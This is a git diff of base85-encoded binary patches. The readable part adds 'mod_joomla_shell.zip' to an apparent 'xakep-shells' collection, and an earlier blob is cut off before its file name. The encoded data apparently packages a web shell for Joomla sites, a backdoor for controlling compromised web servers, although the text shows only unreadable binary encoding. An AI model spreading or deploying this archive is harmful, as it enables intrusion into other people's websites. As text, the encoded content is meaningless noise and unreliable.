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

literal 0
HcmV?d00001

diff --git a/xakep-shells/others/mod_joomla_shell.zip b/xakep-shells/others/mod_joomla_shell.zip
new file mode 100644
index 0000000000000000000000000000000000000000..0462780f9061445a8fc9983133c611481df32eb6
GIT binary patch
literal 34247
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
